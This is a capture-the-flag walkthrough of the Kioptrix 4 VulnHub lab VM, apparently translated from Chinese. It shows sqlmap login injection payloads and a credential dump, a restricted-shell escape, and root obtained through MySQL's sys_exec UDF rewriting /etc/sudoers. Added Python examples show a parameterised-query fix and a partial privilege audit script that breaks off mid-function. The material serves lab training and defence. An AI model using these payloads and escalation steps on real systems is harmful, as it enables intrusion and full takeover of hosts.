# Lab setup

Download: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

The download is a bare virtual disk and cannot be opened directly: create a new virtual machine and attach the disk to it. See this article: https://blog.csdn.net/qq_32261191/article/details/106408751

IP address in NAT mode: 192.168.74.136

# Information gathering

# nmap

```
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.74.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:26 EDT
Nmap scan report for 192.168.74.136
Host is up (0.00041s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D3:23:98 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2024-04-07T15:27:02-04:00
|_clock-skew: mean: 10h00m02s, deviation: 2h49m43s, median: 8h00m01s

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.74.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds
```

Ports 22, 80, 139 and 445 are open.

```
┌──(root㉿kali)-[~]
└─# nmap --script=vuln 192.168.74.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:33 EDT
Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.21% done; ETC: 07:36 (0:00:01 remaining)
Nmap scan report for 192.168.74.136
Host is up (0.00037s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.74.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.74.136:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.74.136:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.74.136:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:D3:23:98 (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 324.75 seconds
```

The vuln scripts flag CSRF, a database backup file, and a Slowloris slow DoS issue that is not very important here.

# dirsearch

```
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.136
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.74.136/_24-04-07_07-32-38.txt

Target: http://192.168.74.136/

[07:32:38] Starting:
[07:32:41] 403 -  332B  - /.ht_wsr.txt
[07:32:41] 403 -  335B  - /.htaccess.bak1
[07:32:41] 403 -  335B  - /.htaccess.orig
[07:32:41] 403 -  335B  - /.htaccess.save
[07:32:41] 403 -  336B  - /.htaccess_extra
[07:32:41] 403 -  333B  - /.htaccess_sc
[07:32:41] 403 -  333B  - /.htaccessBAK
[07:32:41] 403 -  334B  - /.htaccessOLD2
[07:32:41] 403 -  335B  - /.htaccess_orig
[07:32:41] 403 -  337B  - /.htaccess.sample
[07:32:41] 403 -  326B  - /.html
[07:32:41] 403 -  325B  - /.htm
[07:32:41] 403 -  335B  - /.htpasswd_test
[07:32:41] 403 -  333B  - /.htaccessOLD
[07:32:41] 403 -  331B  - /.htpasswds
[07:32:41] 403 -  332B  - /.httr-oauth
[07:33:04] 403 -  329B  - /cgi-bin/
[07:33:05] 200 -  109B  - /checklogin
[07:33:05] 200 -  109B  - /checklogin.php
[07:33:09] 200 -  298B  - /database.sql
[07:33:11] 403 -  325B  - /doc/
[07:33:11] 403 -  340B  - /doc/en/changes.html
[07:33:11] 403 -  329B  - /doc/api/
[07:33:11] 403 -  340B  - /doc/html/index.html
[07:33:11] 403 -  339B  - /doc/stable.version
[07:33:20] 301 -  356B  - /images  ->  http://192.168.74.136/images/
[07:33:20] 200 -  933B  - /images/
[07:33:27] 302 -    0B  - /logout.php  ->  index.php
[07:33:27] 302 -    0B  - /logout  ->  index.php
[07:33:27] 302 -    0B  - /logout/  ->  index.php
[07:33:29] 302 -  220B  - /member.php  ->  index.php
[07:33:29] 302 -  220B  - /member  ->  index.php
[07:33:29] 302 -  220B  - /member/admin.asp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.aspx  ->  index.php
[07:33:29] 302 -  220B  - /member/login.jsp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.asp  ->  index.php
[07:33:29] 302 -  220B  - /member/login.html  ->  index.php
[07:33:29] 302 -  220B  - /member/login.js  ->  index.php
[07:33:29] 302 -  220B  - /member/logon  ->  index.php
[07:33:29] 302 -  220B  - /member/signin  ->  index.php
[07:33:29] 302 -  220B  - /member/login  ->  index.php
[07:33:29] 302 -  220B  - /member/login.php  ->  index.php
[07:33:29] 302 -  220B  - /member/  ->  index.php
[07:33:29] 302 -  220B  - /member/login.rb  ->  index.php
[07:33:29] 302 -  220B  - /member/login.py  ->  index.php
[07:33:49] 403 -  334B  - /server-status
[07:33:49] 403 -  335B  - /server-status/
```

The database backup file shows up here too; this is the important one.

# Web information

```
┌──(root㉿kali)-[~]
└─# whatweb http://192.168.74.136/
http://192.168.74.136/ [200 OK] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.74.136], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], PasswordField[mypassword], X-Powered-By[PHP/5.2.4-2ubuntu5.6]
```

# Summary

- Database backup file
- CSRF
- SSH brute force
- Samba service attacks
- Apache 2.2.8
- PHP 5.2.4
- Linux 2.6.9 - 2.6.33

# Exploitation

With a stack like this, attacks at the web layer are the first thing to try.

# Database leak

Download the database dump and look at it first.

```sql
CREATE TABLE `members` (
`id` int(4) NOT NULL auto_increment,
`username` varchar(65) NOT NULL default '',
`password` varchar(65) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=2 ;
-- 
-- Dumping data for table `members`
-- 
INSERT INTO `members` VALUES (1, 'john', '1234');
```

It contains one set of credentials: john/1234.

That means we may be able to log in to the web page and go further, so try logging in first.

Wrong username or password. Are you messing with me? Straight to injection!

# SQL injection

sqlmap, go!

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:24 /2024-04-07/

[07:56:24] [INFO] testing connection to the target URL
[07:56:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:56:24] [INFO] testing if the target URL content is stable
[07:56:25] [INFO] target URL content is stable
[07:56:25] [INFO] testing if POST parameter 'myusername' is dynamic
[07:56:25] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[07:56:25] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[07:56:25] [INFO] testing for SQL injection on POST parameter 'myusername'
[07:56:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:56:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:56:29] [INFO] testing 'Generic inline queries'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:56:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:56:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[07:56:29] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] 

[07:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:56:43] [WARNING] POST parameter 'myusername' does not seem to be injectable
[07:56:43] [INFO] testing if POST parameter 'mypassword' is dynamic
[07:56:43] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[07:56:43] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[07:56:43] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 

[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:45] [INFO] testing 'Generic inline queries'
[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:56:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n] 

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] 

[07:56:48] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL inline queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:58] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[07:56:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:56:58] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[07:56:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[07:56:59] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive


sqlmap identified the following injection point(s) with a total of 346 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[07:58:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[07:58:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'

[*] ending @ 07:58:01 /2024-04-07/
```

Boolean-based blind and time-based blind injection were found. Read the database contents directly with `sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dbs`:

```
[*] information_schema
[*] members
[*] mysql
```
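To show why the `mypassword` field was injectable and what fixes it, here is an added example (not code from the original page or from the Kioptrix VM) that rebuilds the `members` table from the dump in SQLite and runs sqlmap's boolean-based payload through a string-concatenated query and through a parameterised one. The shape of the checklogin.php query is an assumption, since the page never shows the PHP; MySQL's `#` comment marker is swapped for the standard `-- ` form because SQLite does not treat `#` as a comment.

```python
import sqlite3

# Constructed in-memory stand-in for the `members` table from the database.sql
# dump above, loaded with the one row the dump contains (john / 1234).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members ("
                 "id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO members VALUES (1, 'john', '1234')")
    conn.commit()
    return conn


def login_vulnerable(conn, myusername, mypassword):
    """Assumed shape of the query behind checklogin.php: the page does not show the
    PHP, so this reconstructs the bug sqlmap reported, i.e. both form fields pasted
    straight into the SQL text. Returns the matched username, or None."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (myusername, mypassword))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, myusername, mypassword):
    """Same query with bound parameters. The driver passes the values separately
    from the statement, so quotes, OR and comment markers inside mypassword are
    compared as literal characters instead of being parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (myusername, mypassword),
    ).fetchone()
    return row[0] if row else None


# sqlmap's boolean-based payload from the page. MySQL treats '#' as a comment
# marker but SQLite does not, so the standard '-- ' form is used here (the
# page's time-based payload uses that same '-- ' form).
PAYLOAD = "-7436' OR 9853=9853-- "


def compare(conn):
    """Run the same inputs through both versions; returns (vulnerable, hardened)
    results per case. AND binds tighter than OR, so the payload turns the WHERE
    clause into (username='john' AND password='-7436') OR 9853=9853."""
    return {
        "valid_creds": (login_vulnerable(conn, "john", "1234"),
                        login_hardened(conn, "john", "1234")),
        "wrong_pw": (login_vulnerable(conn, "john", "123456"),
                     login_hardened(conn, "john", "123456")),
        "payload": (login_vulnerable(conn, "john", PAYLOAD),
                    login_hardened(conn, "john", PAYLOAD)),
    }


if __name__ == "__main__":
    for case, (vuln, hard) in compare(make_db()).items():
        print("%-11s vulnerable -> %-5s hardened -> %s" % (case, vuln, hard))
```

The vulnerable version logs the payload in as john while the hardened one rejects it; storing passwords in plain text, as the dump shows, is a separate problem that parameterisation does not address.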

Dump the whole thing.

```
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:03:52 /2024-04-07/

[08:03:52] [INFO] resuming back-end DBMS 'mysql' 
[08:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[08:03:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[08:03:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:03:52] [INFO] fetching current database
[08:03:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:03:52] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n] 

redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] 

members
[08:04:01] [INFO] fetching tables for database: 'members'
[08:04:01] [INFO] fetching number of tables for database 'members'
[08:04:01] [INFO] resumed: 1
[08:04:01] [INFO] resumed: members
[08:04:01] [INFO] fetching columns for table 'members' in database 'members'
[08:04:01] [INFO] retrieved: 3
[08:04:01] [INFO] retrieved: id
[08:04:01] [INFO] retrieved: username
[08:04:02] [INFO] retrieved: password
[08:04:02] [INFO] fetching entries for table 'members' in database 'members'
[08:04:02] [INFO] fetching number of entries for table 'members' in database 'members'
[08:04:02] [INFO] retrieved: 2
[08:04:02] [INFO] retrieved: 1
[08:04:02] [INFO] retrieved: MyNameIsJohn
[08:04:03] [INFO] retrieved: john
[08:04:04] [INFO] retrieved: 2
[08:04:04] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[08:04:05] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[08:04:06] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.74.136/dump/members/members.csv'
[08:04:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'

[*] ending @ 08:04:06 /2024-04-07/
```

Got the credentials and logged in. The login works, but there is nothing there at all.

So, can we get in over ssh?

# ssh

```
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.74.136
The authenticity of host '192.168.74.136 (192.168.74.136)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.136' (DSA) to the list of known hosts.
john@192.168.74.136's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 
```

We're in. Note that the `-oHostKeyAlgorithms=+ssh-dss` parameter is required: a current ssh client no longer accepts the DSS (ssh-dss) host-key algorithm by default, and this old server only offers DSA and RSA keys of that era, so without the parameter the connection is refused.

But not even `ls` works: it turns out to be a restricted shell.

Restricted shells and ways around them: https://www.aldeid.com/wiki/Lshell

We need to break out into a normal interactive shell.

```
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ whoami
john
```

We now have a normal shell, but still as a low-privileged user.

Next, we need to find a way to escalate privileges.

The website has to talk to a database. If the database runs as root, that may be a way to escalate, so let's check.

```
john@Kioptrix4:~$ ps -aux | grep mysql
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root      4419  0.0  0.1   1772   528 ?        S    15:20   0:00 /bin/sh /usr/bin/mysqld_safe
root      4461  0.0  3.3 127224 17304 ?        Sl   15:20   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3
root      4463  0.0  0.1   1700   556 ?        S    15:20   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
john      4911  0.0  0.1   3004   756 pts/0    R+   16:43   0:00 grep mysql
```

Very good: the database runs as root, so let's try to escalate through it.

# Privilege escalation

Try logging in to the database: an empty password, the passwords obtained so far, passwords from the site's configuration files, or simply brute force.

Since this is a local connection, try the empty password first.

```
john@Kioptrix4:~$ mysql -u root -h localhost
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4918
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
```

Straight in.

Change the owner of the sudoers file through the `sys_exec` UDF, which runs the command as the MySQL server's own user, i.e. root:

```
mysql> SELECT sys_exec('chown john:john /etc/sudoers');
+------------------------------------------+
| sys_exec('chown john:john /etc/sudoers') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.00 sec)
```

Add the john account to sudoers:

```
john@Kioptrix4:~$ chmod 777 /etc/sudoers
john@Kioptrix4:~$ vim /etc/sudoers 
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root    ALL=(ALL) ALL
john    ALL=NOPASSWD :ALL
# Uncomment to allow members of group sudo to not need a password
# (Note that later entries override this, so you might need to move
# it further down)
# %sudo ALL=NOPASSWD: ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
```

Now switching to root with sudo requires no password.

After saving, the permissions and ownership have to be changed back:

```
john@Kioptrix4:~$ chmod 0440 /etc/sudoers
mysql> select sys_exec('chown root:root /etc/sudoers');
+------------------------------------------+
| sys_exec('chown root:root /etc/sudoers') |
+------------------------------------------+
| NULL                                     | 
+------------------------------------------+
1 row in set (0.00 sec)
mysql> exit
Bye
john@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# whoami
root
```

Root obtained!
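The chain above rests on three conditions a defender can check for: mysqld running as root, a passwordless `ALL` entry in sudoers, and /etc/sudoers no longer being 0440 root:root. The following is an added audit example (not code from the original page or from the VM) that checks each of them; the `ps aux` and sudoers samples are constructed from the listings on this page, the extra mysql-owned mysqld line is invented to show the safe case, and the sudoers parser is deliberately simplified.

```python
import re

# Constructed sample of `ps aux` output, modelled on the page's listing (the
# mysqld command line is shortened; the mysql-owned mysqld line is invented
# to show the safe case).
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      4419  0.0  0.1   1772   528 ?        S    15:20   0:00 /bin/sh /usr/bin/mysqld_safe
root      4461  0.0  3.3 127224 17304 ?        Sl   15:20   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root
mysql     4470  0.0  3.0 120000 15000 ?        Sl   15:21   0:01 /usr/sbin/mysqld --user=mysql
john      4911  0.0  0.1   3004   756 pts/0    R+   16:43   0:00 grep mysql
"""

# The sudoers entries from the page's listing, including the commented %sudo line.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL) ALL
john    ALL=NOPASSWD :ALL
# %sudo ALL=NOPASSWD: ALL
%admin ALL=(ALL) ALL
"""


def mysqld_as_root(ps_output):
    """PIDs of mysqld processes owned by root, parsed from `ps aux` text.
    This is the precondition of the page's chain: with mysqld running as root,
    any command execution reachable from SQL (here the sys_exec UDF) is root."""
    pids = []
    for line in ps_output.splitlines()[1:]:        # skip the header row
        fields = line.split(None, 10)              # COMMAND keeps its spaces
        if len(fields) < 11:
            continue
        user, pid, command = fields[0], fields[1], fields[10]
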